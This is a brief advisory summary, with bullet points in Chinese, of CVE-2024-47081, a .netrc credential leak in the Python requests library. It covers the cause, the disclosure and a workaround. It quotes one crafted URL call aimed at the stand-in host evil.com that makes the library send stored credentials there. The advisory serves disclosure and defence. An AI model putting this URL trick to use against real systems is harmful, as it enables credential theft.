CVE-2024-47081: Netrc credential leak in PSF requests library
a year ago
- #vulnerability
- #python
- #security
- PSF请求库因URL处理不当导致.netrc凭证泄露给第三方
- 漏洞触发方式:调用API requests.get('http://example.com:@evil.com/')时
- 为example.com配置的凭证会被泄露至evil.com
- 根本原因定位在requests/utils.py文件中
- 漏洞已于2024年9月12日向维护者报告,目前暂无修复方案
- GitHub为此问题分配了CVE编号CVE-2024-47081
- 临时解决方案:在API调用中显式指定凭证以禁用.netrc访问